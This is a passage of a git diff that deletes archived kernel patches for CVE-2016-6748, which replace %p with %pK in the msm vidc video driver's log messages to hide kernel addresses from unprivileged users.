- 		goto ocmem_unset_failed;
-@@ -1335,7 +1335,7 @@ static int __alloc_set_ocmem(struct venus_hfi_device *device, bool locked)
- 	int rc = 0;
- 
- 	if (!device || !device->res) {
--		dprintk(VIDC_ERR, "%s Invalid param, device: 0x%p\n",
-+		dprintk(VIDC_ERR, "%s Invalid param, device: 0x%pK\n",
- 				__func__, device);
- 		return -EINVAL;
- 	}
-@@ -1375,7 +1375,7 @@ static int __unset_free_ocmem(struct venus_hfi_device *device)
- 	int rc = 0;
- 
- 	if (!device || !device->res) {
--		dprintk(VIDC_ERR, "%s Invalid param, device: 0x%p\n",
-+		dprintk(VIDC_ERR, "%s Invalid param, device: 0x%pK\n",
- 				__func__, device);
- 		return -EINVAL;
- 	}
-@@ -1551,7 +1551,7 @@ static unsigned long venus_hfi_get_core_clock_rate(void *dev)
- 	struct clock_info *vc;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, device);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, device);
- 		return -EINVAL;
- 	}
- 
-@@ -1607,7 +1607,7 @@ static int venus_hfi_halt_axi(struct venus_hfi_device *device)
- 	u32 reg;
- 	int rc = 0;
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid input: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid input: %pK\n", device);
- 		return -EINVAL;
- 	}
- 	/*
-@@ -1642,7 +1642,7 @@ static inline int venus_hfi_power_off(struct venus_hfi_device *device)
- 	int rc = 0;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return -EINVAL;
- 	}
- 	if (!device->power_enabled) {
-@@ -1709,7 +1709,7 @@ static inline int venus_hfi_power_on(struct venus_hfi_device *device)
- 	int rc = 0;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return -EINVAL;
- 	}
- 	if (device->power_enabled)
-@@ -1825,7 +1825,7 @@ static int venus_hfi_power_enable(void *dev)
- 	int rc = 0;
- 	struct venus_hfi_device *device = dev;
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return -EINVAL;
- 	}
- 	mutex_lock(&device->write_lock);
-@@ -1845,7 +1845,7 @@ static int venus_hfi_regulator_set_voltage(
- 	struct regulator_info *rinfo = NULL;
- 
- 	if (!device || !cv_info) {
--		dprintk(VIDC_WARN, "%s: invalid args %p %p\n",
-+		dprintk(VIDC_WARN, "%s: invalid args %pK %pK\n",
- 			__func__, device, cv_info);
- 		return -EINVAL;
- 	}
-@@ -1893,7 +1893,7 @@ static int venus_hfi_scale_regulators(struct venus_hfi_device *device,
- 	bool matches = false;
- 
- 	if (!device || !data) {
--		dprintk(VIDC_ERR, "%s: Invalid args %p, %p\n",
-+		dprintk(VIDC_ERR, "%s: Invalid args %pK, %pK\n",
- 			__func__, device, data);
- 		return -EINVAL;
- 	}
-@@ -1968,7 +1968,7 @@ static int venus_hfi_scale_clocks(void *dev, int load,
- 	struct venus_hfi_device *device = dev;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid args: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid args: %pK\n", device);
- 		return -EINVAL;
- 	}
- 
-@@ -2566,7 +2566,7 @@ static int venus_hfi_core_init(void *device)
- 			goto err_core_init;
- 		}
- 
--		dprintk(VIDC_DBG, "Dev_Virt: 0x%pa, Reg_Virt: 0x%p\n",
-+		dprintk(VIDC_DBG, "Dev_Virt: 0x%pa, Reg_Virt: 0x%pK\n",
- 			&dev->hal_data->firmware_base,
- 			dev->hal_data->register_base);
- 
-@@ -2718,12 +2718,12 @@ static void venus_hfi_core_clear_interrupt(struct venus_hfi_device *device)
- 		device->intr_status |= intr_status;
- 		device->reg_count++;
- 		dprintk(VIDC_DBG,
--			"INTERRUPT for device: 0x%p: times: %d interrupt_status: %d\n",
-+			"INTERRUPT for device: 0x%pK: times: %d interrupt_status: %d\n",
- 			device, device->reg_count, intr_status);
- 	} else {
- 		device->spur_count++;
- 		dprintk(VIDC_INFO,
--			"SPURIOUS_INTR for device: 0x%p: times: %d interrupt_status: %d\n",
-+			"SPURIOUS_INTR for device: 0x%pK: times: %d interrupt_status: %d\n",
- 			device, device->spur_count, intr_status);
- 	}
- 
-@@ -2876,7 +2876,7 @@ static int venus_hfi_session_clean(void *session)
- 	sess_close = session;
- 	device = sess_close->device;
- 	venus_hfi_flush_debug_queue(sess_close->device, NULL);
--	dprintk(VIDC_DBG, "deleted the session: 0x%p\n",
-+	dprintk(VIDC_DBG, "deleted the session: 0x%pK\n",
- 			sess_close);
- 	mutex_lock(&device->session_lock);
- 	list_del(&sess_close->list);
-@@ -2914,7 +2914,7 @@ static void *venus_hfi_session_init(void *device, void *session_id,
- 	new_session->codec = codec_type;
- 	new_session->domain = session_type;
- 	dprintk(VIDC_DBG,
--		"%s: inst %p, session %p, codec 0x%x, domain 0x%x\n",
-+		"%s: inst %pK, session %pK, codec 0x%x, domain 0x%x\n",
- 		__func__, session_id, new_session,
- 		new_session->codec, new_session->domain);
- 
-@@ -2992,7 +2992,7 @@ static int venus_hfi_session_abort(void *sess)
- 	struct hal_session *session;
- 	session = sess;
- 	if (!session || !session->device) {
--		dprintk(VIDC_ERR, "%s: Invalid Params %p\n",
-+		dprintk(VIDC_ERR, "%s: Invalid Params %pK\n",
- 			__func__, session);
- 		return -EINVAL;
- 	}
-@@ -3012,7 +3012,7 @@ static int venus_hfi_session_set_buffers(void *sess,
- 	struct venus_hfi_device *device;
- 
- 	if (!session || !session->device || !buffer_info) {
--		dprintk(VIDC_ERR, "%s: Invalid Params, %p %p\n",
-+		dprintk(VIDC_ERR, "%s: Invalid Params, %pK %pK\n",
- 			__func__, session, buffer_info);
- 		return -EINVAL;
- 	}
-@@ -3047,7 +3047,7 @@ static int venus_hfi_session_release_buffers(void *sess,
- 	struct venus_hfi_device *device;
- 
- 	if (!session || !session->device || !buffer_info) {
--		dprintk(VIDC_ERR, "%s: Invalid Params %p, %p\n",
-+		dprintk(VIDC_ERR, "%s: Invalid Params %pK, %pK\n",
- 			__func__, session, buffer_info);
- 		return -EINVAL;
- 	}
-@@ -3738,7 +3738,7 @@ static void venus_hfi_response_handler(struct venus_hfi_device *device)
- 		}
- 		venus_hfi_flush_debug_queue(device, packet);
- 	} else {
--		dprintk(VIDC_DBG, "device (%p) is in deinit state\n", device);
-+		dprintk(VIDC_DBG, "device (%pK) is in deinit state\n", device);
- 	}
- 	kfree(packet);
- }
-@@ -3750,7 +3750,7 @@ static void venus_hfi_core_work_handler(struct work_struct *work)
- 
- 	dprintk(VIDC_INFO, "GOT INTERRUPT\n");
- 	if (!device->callback) {
--		dprintk(VIDC_ERR, "No interrupt callback function: %p\n",
-+		dprintk(VIDC_ERR, "No interrupt callback function: %pK\n",
- 				device);
- 		return;
- 	}
-@@ -3850,7 +3850,7 @@ static inline int venus_hfi_init_clocks(struct msm_vidc_platform_resources *res,
- 	struct clock_info *cl = NULL;
- 
- 	if (!res || !device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return -EINVAL;
- 	}
- 
-@@ -3921,7 +3921,7 @@ static inline void venus_hfi_disable_unprepare_clks(
- 	struct clock_info *cl;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return;
- 	}
- 
-@@ -3957,7 +3957,7 @@ static inline int venus_hfi_prepare_enable_clks(struct venus_hfi_device *device)
- 	struct clock_info *cl = NULL, *cl_fail = NULL;
- 	int rc = 0;
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return -EINVAL;
- 	}
- 
-@@ -4026,7 +4026,7 @@ static int venus_hfi_register_iommu_domains(struct venus_hfi_device *device,
- 		domain = iommu_group_get_iommudata(iommu_map->group);
- 		if (!domain) {
- 			dprintk(VIDC_ERR,
--				"Failed to get domain data for group %p\n",
-+				"Failed to get domain data for group %pK\n",
- 				iommu_map->group);
- 			rc = -EINVAL;
- 			goto fail_group;
-@@ -4034,7 +4034,7 @@ static int venus_hfi_register_iommu_domains(struct venus_hfi_device *device,
- 		iommu_map->domain = msm_find_domain_no(domain);
- 		if (iommu_map->domain < 0) {
- 			dprintk(VIDC_ERR,
--				"Failed to get domain index for domain %p\n",
-+				"Failed to get domain index for domain %pK\n",
- 				domain);
- 			rc = -EINVAL;
- 			goto fail_group;
-@@ -4180,7 +4180,7 @@ static int venus_hfi_init_resources(struct venus_hfi_device *device,
- 
- 	device->res = res;
- 	if (!res) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", res);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", res);
- 		return -ENODEV;
- 	}
- 
-@@ -4237,7 +4237,7 @@ static int venus_hfi_iommu_get_domain_partition(void *dev, u32 flags,
- 	struct venus_hfi_device *device = dev;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "%s: Invalid param device: %p\n",
-+		dprintk(VIDC_ERR, "%s: Invalid param device: %pK\n",
- 		 __func__, device);
- 		return -EINVAL;
- 	}
-@@ -4262,7 +4262,7 @@ static int protect_cp_mem(struct venus_hfi_device *device)
- 
- 	iommu_group_set = &device->res->iommu_group_set;
- 	if (!iommu_group_set) {
--		dprintk(VIDC_ERR, "invalid params: %p\n", iommu_group_set);
-+		dprintk(VIDC_ERR, "invalid params: %pK\n", iommu_group_set);
- 		return -EINVAL;
- 	}
- 
-@@ -4430,7 +4430,7 @@ static int venus_hfi_load_fw(void *dev)
- 	struct venus_hfi_device *device = dev;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "%s Invalid paramter: %p\n",
-+		dprintk(VIDC_ERR, "%s Invalid paramter: %pK\n",
- 			__func__, device);
- 		return -EINVAL;
- 	}
-@@ -4520,7 +4520,7 @@ static void venus_hfi_unload_fw(void *dev)
- {
- 	struct venus_hfi_device *device = dev;
- 	if (!device) {
--		dprintk(VIDC_ERR, "%s Invalid paramter: %p\n",
-+		dprintk(VIDC_ERR, "%s Invalid paramter: %pK\n",
- 			__func__, device);
- 		return;
- 	}
-@@ -4556,7 +4556,7 @@ static int venus_hfi_get_fw_info(void *dev, struct hal_fw_info *fw_info)
- 
- 	if (!device || !fw_info) {
- 		dprintk(VIDC_ERR,
--			"%s Invalid paramter: device = %p fw_info = %p\n",
-+			"%s Invalid paramter: device = %pK fw_info = %pK\n",
- 				__func__, device, fw_info);
- 		return -EINVAL;
- 	}
-@@ -4745,7 +4745,7 @@ static void *venus_hfi_get_device(u32 device_id,
- 	int rc = 0;
- 
- 	if (!res || !callback) {
--		dprintk(VIDC_ERR, "Invalid params: %p %p\n", res, callback);
-+		dprintk(VIDC_ERR, "Invalid params: %pK %pK\n", res, callback);
- 		return NULL;
- 	}
- 
-@@ -4845,7 +4845,7 @@ int venus_hfi_initialize(struct hfi_device *hdev, u32 device_id,
- 	int rc = 0;
- 
- 	if (!hdev || !res || !callback) {
--		dprintk(VIDC_ERR, "Invalid params: %p %p %p\n",
-+		dprintk(VIDC_ERR, "Invalid params: %pK %pK %pK\n",
- 			hdev, res, callback);
- 		rc = -EINVAL;
- 		goto err_venus_hfi_init;
-diff --git a/drivers/media/platform/msm/vidc/vidc_hfi.c b/drivers/media/platform/msm/vidc/vidc_hfi.c
-index ef0de37..193b42f 100644
---- a/drivers/media/platform/msm/vidc/vidc_hfi.c
-+++ b/drivers/media/platform/msm/vidc/vidc_hfi.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2013, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -61,7 +61,7 @@ void vidc_hfi_deinitialize(enum msm_vidc_hfi_type hfi_type,
- 			struct hfi_device *hdev)
- {
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "%s invalid device %p", __func__, hdev);
-+		dprintk(VIDC_ERR, "%s invalid device %pK", __func__, hdev);
- 		return;
- 	}
- 
-diff --git a/drivers/media/platform/msm/vidc/vmem/vmem.c b/drivers/media/platform/msm/vidc/vmem/vmem.c
-index 81e5b08..fb733fb 100644
---- a/drivers/media/platform/msm/vidc/vmem/vmem.c
-+++ b/drivers/media/platform/msm/vidc/vmem/vmem.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -115,7 +115,7 @@ static inline u32 __readl(void * __iomem addr)
- {
- 	u32 value = 0;
- 
--	pr_debug("read %p ", addr);
-+	pr_debug("read %pK ", addr);
- 	value = readl_relaxed(addr);
- 	pr_debug("-> %08x\n", value);
- 
-@@ -124,7 +124,7 @@ static inline u32 __readl(void * __iomem addr)
- 
- static inline void __writel(u32 val, void * __iomem addr)
- {
--	pr_debug("write %08x -> %p\n", val, addr);
-+	pr_debug("write %08x -> %pK\n", val, addr);
- 	writel_relaxed(val, addr);
- 	/*
- 	 * Commit all writes via a mem barrier, as subsequent __readl()
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6748/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6748/3.18/0002.patch
deleted file mode 100644
index e6bc8818..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6748/3.18/0002.patch
+++ /dev/null
@@ -1,1739 +0,0 @@
-From 313d9f89e76ada8d900c9a578cd5cb77d5813625 Mon Sep 17 00:00:00 2001
-From: Abdulla Anam <abdullahanam@codeaurora.org>
-Date: Fri, 3 Jun 2016 17:39:42 +0530
-Subject: msm: vidc: use %pK instead of %p which respects kptr_restrict sysctl
-
-Hide kernel pointers from unprivileged ussers by using %pK format-
-specifier instead of %p. This respects the kptr_restrict sysctl
-setting which is by default on. So by default %pK will print zeroes
-as address. echo 1 to kptr_restrict to print proper kernel addresses.
-
-CRs-Fixed: 987018
-Change-Id: I4772257a557c6730ecc0624cbc8e5614e893e9fd
-Signed-off-by: Abdulla Anam <abdullahanam@codeaurora.org>
-Signed-off-by: Bikshapathi Kothapeta <bkotha@codeaurora.org>
----
- .../msm/vidc/governors/msm_vidc_table_gov.c        |   6 +-
- .../media/platform/msm/vidc/hfi_packetization.c    |   8 +-
- .../media/platform/msm/vidc/hfi_response_handler.c |   8 +-
- drivers/media/platform/msm/vidc/msm_smem.c         |  32 +++---
- drivers/media/platform/msm/vidc/msm_v4l2_vidc.c    |   6 +-
- drivers/media/platform/msm/vidc/msm_vdec.c         |  34 +++---
- drivers/media/platform/msm/vidc/msm_venc.c         |  34 +++---
- drivers/media/platform/msm/vidc/msm_vidc.c         |  30 ++---
- drivers/media/platform/msm/vidc/msm_vidc_common.c  | 122 ++++++++++-----------
- drivers/media/platform/msm/vidc/msm_vidc_dcvs.c    |  16 +--
- drivers/media/platform/msm/vidc/msm_vidc_debug.c   |  20 ++--
- .../media/platform/msm/vidc/msm_vidc_res_parse.c   |   6 +-
- drivers/media/platform/msm/vidc/venus_boot.c       |   4 +-
- drivers/media/platform/msm/vidc/venus_hfi.c        |  52 ++++-----
- drivers/media/platform/msm/vidc/vidc_hfi.c         |   4 +-
- drivers/media/platform/msm/vidc/vmem/vmem.c        |   7 +-
- 16 files changed, 194 insertions(+), 195 deletions(-)
-
-diff --git a/drivers/media/platform/msm/vidc/governors/msm_vidc_table_gov.c b/drivers/media/platform/msm/vidc/governors/msm_vidc_table_gov.c
-index f733c08..dded8a2 100644
---- a/drivers/media/platform/msm/vidc/governors/msm_vidc_table_gov.c
-+++ b/drivers/media/platform/msm/vidc/governors/msm_vidc_table_gov.c
-@@ -90,7 +90,7 @@ static int msm_vidc_table_get_target_freq(struct devfreq *dev,
- 	int i = 0;
- 
- 	if (!dev || !frequency || !flag) {
--		dprintk(VIDC_ERR, "%s: Invalid params %p, %p, %p\n",
-+		dprintk(VIDC_ERR, "%s: Invalid params %pK, %pK, %pK\n",
- 			__func__, dev, frequency, flag);
- 		return -EINVAL;
- 	}
-@@ -173,7 +173,7 @@ static int msm_vidc_free_bus_table(struct platform_device *pdev,
- 	int rc = 0, i = 0;
- 
- 	if (!pdev || !data) {
--		dprintk(VIDC_ERR, "%s: invalid args %p %p\n",
-+		dprintk(VIDC_ERR, "%s: invalid args %pK %pK\n",
- 			__func__, pdev, data);
- 		return -EINVAL;
- 	}
-@@ -197,7 +197,7 @@ static int msm_vidc_load_bus_table(struct platform_device *pdev,
- 	struct device_node *child_node = NULL;
- 
- 	if (!pdev || !data) {
--		dprintk(VIDC_ERR, "%s: invalid args %p %p\n",
-+		dprintk(VIDC_ERR, "%s: invalid args %pK %pK\n",
- 			__func__, pdev, data);
- 		return -EINVAL;
- 	}
-diff --git a/drivers/media/platform/msm/vidc/hfi_packetization.c b/drivers/media/platform/msm/vidc/hfi_packetization.c
-index 0d38aa9..90e4aa4 100644
---- a/drivers/media/platform/msm/vidc/hfi_packetization.c
-+++ b/drivers/media/platform/msm/vidc/hfi_packetization.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-201666666, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1439,7 +1439,7 @@ int create_pkt_cmd_session_set_property(
- 			break;
- 		default:
- 			dprintk(VIDC_ERR,
--					"Invalid Rate control setting: %p\n",
-+					"Invalid Rate control setting: %pK\n",
- 					pdata);
- 			break;
- 		}
-@@ -2130,7 +2130,7 @@ int create_pkt_ssr_cmd(enum hal_ssr_trigger_type type,
- 		struct hfi_cmd_sys_test_ssr_packet *pkt)
- {
- 	if (!pkt) {
--		dprintk(VIDC_ERR, "Invalid params, device: %p\n", pkt);
-+		dprintk(VIDC_ERR, "Invalid params, device: %pK\n", pkt);
- 		return -EINVAL;
- 	}
- 	pkt->size = sizeof(struct hfi_cmd_sys_test_ssr_packet);
-@@ -2143,7 +2143,7 @@ int create_pkt_cmd_sys_image_version(
- 		struct hfi_cmd_sys_get_property_packet *pkt)
- {
- 	if (!pkt) {
--		dprintk(VIDC_ERR, "%s invalid param :%p\n", __func__, pkt);
-+		dprintk(VIDC_ERR, "%s invalid param :%pK\n", __func__, pkt);
- 		return -EINVAL;
- 	}
- 	pkt->size = sizeof(struct hfi_cmd_sys_get_property_packet);
-diff --git a/drivers/media/platform/msm/vidc/hfi_response_handler.c b/drivers/media/platform/msm/vidc/hfi_response_handler.c
-index db0ea848a..91eab00 100644
---- a/drivers/media/platform/msm/vidc/hfi_response_handler.c
-+++ b/drivers/media/platform/msm/vidc/hfi_response_handler.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -943,7 +943,7 @@ static enum vidc_status hfi_parse_init_done_properties(
- 		}
- 		default:
- 			dprintk(VIDC_DBG,
--				"%s: default case - data_ptr %p, prop_id 0x%x\n",
-+				"%s: default case - data_ptr %pK, prop_id 0x%x\n",
- 				__func__, data_ptr, prop_id);
- 			break;
- 		}
-@@ -1043,7 +1043,7 @@ static void hfi_process_sess_get_prop_profile_level(
- 	dprintk(VIDC_DBG, "Entered %s\n", __func__);
- 	if (!prop) {
- 		dprintk(VIDC_ERR,
--			"hal_process_sess_get_profile_level: bad_prop: %p\n",
-+			"hal_process_sess_get_profile_level: bad_prop: %pK\n",
- 			prop);
- 		return;
- 	}
-@@ -1074,7 +1074,7 @@ static void hfi_process_sess_get_prop_buf_req(
- 
- 	if (!prop) {
- 		dprintk(VIDC_ERR,
--			"hal_process_sess_get_prop_buf_req: bad_prop: %p\n",
-+			"hal_process_sess_get_prop_buf_req: bad_prop: %pK\n",
- 			prop);
- 		return;
- 	}
-diff --git a/drivers/media/platform/msm/vidc/msm_smem.c b/drivers/media/platform/msm/vidc/msm_smem.c
-index 009d827..f4724c9 100644
---- a/drivers/media/platform/msm/vidc/msm_smem.c
-+++ b/drivers/media/platform/msm/vidc/msm_smem.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -45,7 +45,7 @@ static int get_device_address(struct smem_client *smem_client,
- 	struct context_bank_info *cb = NULL;
- 
- 	if (!iova || !buffer_size || !hndl || !smem_client || !mapping_info) {
--		dprintk(VIDC_ERR, "Invalid params: %p, %p, %p, %p\n",
-+		dprintk(VIDC_ERR, "Invalid params: %pK, %pK, %pK, %pK\n",
- 				smem_client, hndl, iova, buffer_size);
- 		return -EINVAL;
- 	}
-@@ -107,7 +107,7 @@ static int get_device_address(struct smem_client *smem_client,
- 		}
- 		if (table->sgl) {
- 			dprintk(VIDC_DBG,
--				"%s: CB : %s, DMA buf: %p, device: %p, attach: %p, table: %p, table sgl: %p, rc: %d, dma_address: %pa\n",
-+				"%s: CB : %s, DMA buf: %pK, device: %pK, attach: %pK, table: %pK, table sgl: %pK, rc: %d, dma_address: %pa\n",
- 				__func__, cb->name, buf, cb->dev, attach,
- 				table, table->sgl, rc,
- 				&table->sgl->dma_address);
-@@ -137,7 +137,7 @@ static int get_device_address(struct smem_client *smem_client,
- 		}
- 	}
- 
--	dprintk(VIDC_DBG, "mapped ion handle %p to %pa\n", hndl, iova);
-+	dprintk(VIDC_DBG, "mapped ion handle %pK to %pa\n", hndl, iova);
- 	return 0;
- mem_map_sg_failed:
- 	dma_buf_unmap_attachment(attach, table, DMA_BIDIRECTIONAL);
-@@ -157,7 +157,7 @@ static void put_device_address(struct smem_client *smem_client,
- 	struct ion_client *clnt = NULL;
- 
- 	if (!hndl || !smem_client || !mapping_info) {
--		dprintk(VIDC_WARN, "Invalid params: %p, %p\n",
-+		dprintk(VIDC_WARN, "Invalid params: %pK, %pK\n",
- 				smem_client, hndl);
- 		return;
- 	}
-@@ -175,7 +175,7 @@ static void put_device_address(struct smem_client *smem_client,
- 	}
- 	if (is_iommu_present(smem_client->res)) {
- 		dprintk(VIDC_DBG,
--			"Calling dma_unmap_sg - device: %p, address: %pa, buf: %p, table: %p, attach: %p\n",
-+			"Calling dma_unmap_sg - device: %pK, address: %pa, buf: %pK, table: %pK, attach: %pK\n",
- 			mapping_info->dev,
- 			&mapping_info->table->sgl->dma_address,
- 			mapping_info->buf, mapping_info->table,
-@@ -204,9 +204,9 @@ static int ion_user_to_kernel(struct smem_client *client, int fd, u32 offset,
- 	unsigned long ion_flags = 0;
- 
- 	hndl = ion_import_dma_buf(client->clnt, fd);
--	dprintk(VIDC_DBG, "%s ion handle: %p\n", __func__, hndl);
-+	dprintk(VIDC_DBG, "%s ion handle: %pK\n", __func__, hndl);
- 	if (IS_ERR_OR_NULL(hndl)) {
--		dprintk(VIDC_ERR, "Failed to get handle: %p, %d, %d, %p\n",
-+		dprintk(VIDC_ERR, "Failed to get handle: %pK, %d, %d, %pK\n",
- 				client, fd, offset, hndl);
- 		rc = -ENOMEM;
- 		goto fail_import_fd;
-@@ -242,7 +242,7 @@ static int ion_user_to_kernel(struct smem_client *client, int fd, u32 offset,
- 		goto fail_device_address;
- 	}
- 	dprintk(VIDC_DBG,
--		"%s: ion_handle = %p, fd = %d, device_addr = %pa, size = %zx, kvaddr = %p, buffer_type = %d, flags = %#lx\n",
-+		"%s: ion_handle = %pK, fd = %d, device_addr = %pa, size = %zx, kvaddr = %pK, buffer_type = %d, flags = %#lx\n",
- 		__func__, mem->smem_priv, fd, &mem->device_addr, mem->size,
- 		mem->kvaddr, mem->buffer_type, mem->flags);
- 	return rc;
-@@ -339,7 +339,7 @@ static int alloc_ion_mem(struct smem_client *client, size_t size, u32 align,
- 	hndl = ion_alloc(client->clnt, size, align, heap_mask, ion_flags);
- 	if (IS_ERR_OR_NULL(hndl)) {
- 		dprintk(VIDC_ERR,
--		"Failed to allocate shared memory = %p, %zx, %d, %#x\n",
-+		"Failed to allocate shared memory = %pK, %zx, %d, %#x\n",
- 		client, size, align, flags);
- 		rc = -ENOMEM;
- 		goto fail_shared_mem_alloc;
-@@ -377,7 +377,7 @@ static int alloc_ion_mem(struct smem_client *client, size_t size, u32 align,
- 	}
- 	mem->size = size;
- 	dprintk(VIDC_DBG,
--		"%s: ion_handle = %p, device_addr = %pa, size = %#zx, kvaddr = %p, buffer_type = %#x, flags = %#lx\n",
-+		"%s: ion_handle = %pK, device_addr = %pa, size = %#zx, kvaddr = %pK, buffer_type = %#x, flags = %#lx\n",
- 		__func__, mem->smem_priv, &mem->device_addr,
- 		mem->size, mem->kvaddr, mem->buffer_type, mem->flags);
- 	return rc;
-@@ -393,7 +393,7 @@ fail_shared_mem_alloc:
- static void free_ion_mem(struct smem_client *client, struct msm_smem *mem)
- {
- 	dprintk(VIDC_DBG,
--		"%s: ion_handle = %p, device_addr = %pa, size = %#zx, kvaddr = %p, buffer_type = %#x\n",
-+		"%s: ion_handle = %pK, device_addr = %pa, size = %#zx, kvaddr = %pK, buffer_type = %#x\n",
- 		__func__, mem->smem_priv, &mem->device_addr,
- 		mem->size, mem->kvaddr, mem->buffer_type);
- 
-@@ -408,7 +408,7 @@ static void free_ion_mem(struct smem_client *client, struct msm_smem *mem)
- 				(u32)mem->buffer_type, -1, mem->size, -1,
- 				mem->flags, -1);
- 		dprintk(VIDC_DBG,
--			"%s: Freeing handle %p, client: %p\n",
-+			"%s: Freeing handle %pK, client: %pK\n",
- 			__func__, mem->smem_priv, client->clnt);
- 		ion_free(client->clnt, mem->smem_priv);
- 		trace_msm_smem_buffer_ion_op_end("FREE", (u32)mem->buffer_type,
-@@ -469,7 +469,7 @@ static int ion_cache_operations(struct smem_client *client,
- 	int rc = 0;
- 	int msm_cache_ops = 0;
- 	if (!mem || !client) {
--		dprintk(VIDC_ERR, "Invalid params: %p, %p\n",
-+		dprintk(VIDC_ERR, "Invalid params: %pK, %pK\n",
- 			mem, client);
- 		return -EINVAL;
- 	}
-@@ -516,7 +516,7 @@ int msm_smem_cache_operations(void *clt, struct msm_smem *mem,
- 	struct smem_client *client = clt;
- 	int rc = 0;
- 	if (!client) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n",
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n",
- 			client);
- 		return -EINVAL;
- 	}
-@@ -667,7 +667,7 @@ struct context_bank_info *msm_smem_get_context_bank(void *clt,
- 				cb->buffer_type & buffer_type) {
- 			match = cb;
- 			dprintk(VIDC_DBG,
--				"context bank found for CB : %s, device: %p mapping: %p\n",
-+				"context bank found for CB : %s, device: %pK mapping: %pK\n",
- 				match->name, match->dev, match->mapping);
- 			break;
- 		}
-diff --git a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-index 0f7ddf5..4ef6cb5 100644
---- a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-+++ b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -279,7 +279,7 @@ static int read_platform_resources(struct msm_vidc_core *core,
- 		struct platform_device *pdev)
- {
- 	if (!core || !pdev) {
--		dprintk(VIDC_ERR, "%s: Invalid params %p %p\n",
-+		dprintk(VIDC_ERR, "%s: Invalid params %pK %pK\n",
- 			__func__, core, pdev);
- 		return -EINVAL;
- 	}
-@@ -608,7 +608,7 @@ static int msm_vidc_remove(struct platform_device *pdev)
- 	struct msm_vidc_core *core;
- 
- 	if (!pdev) {
--		dprintk(VIDC_ERR, "%s invalid input %p", __func__, pdev);
-+		dprintk(VIDC_ERR, "%s invalid input %pK", __func__, pdev);
- 		return -EINVAL;
- 	}
- 
-diff --git a/drivers/media/platform/msm/vidc/msm_vdec.c b/drivers/media/platform/msm/vidc/msm_vdec.c
-index 34a2130..99b14f4 100644
---- a/drivers/media/platform/msm/vidc/msm_vdec.c
-+++ b/drivers/media/platform/msm/vidc/msm_vdec.c
-@@ -891,7 +891,7 @@ int msm_vdec_prepare_buf(struct msm_vidc_inst *inst,
- 	if (inst->state == MSM_VIDC_CORE_INVALID ||
- 			inst->core->state == VIDC_CORE_INVALID) {
- 		dprintk(VIDC_ERR,
--			"Core %p in bad state, ignoring prepare buf\n",
-+			"Core %pK in bad state, ignoring prepare buf\n",
- 				inst->core);
- 		goto exit;
- 	}
-@@ -970,7 +970,7 @@ int msm_vdec_release_buf(struct msm_vidc_inst *inst,
- 	if (inst->state == MSM_VIDC_CORE_INVALID ||
- 			core->state == VIDC_CORE_INVALID) {
- 		dprintk(VIDC_ERR,
--			"Core %p in bad state, ignoring release output buf\n",
-+			"Core %pK in bad state, ignoring release output buf\n",
- 				core);
- 		goto exit;
- 	}
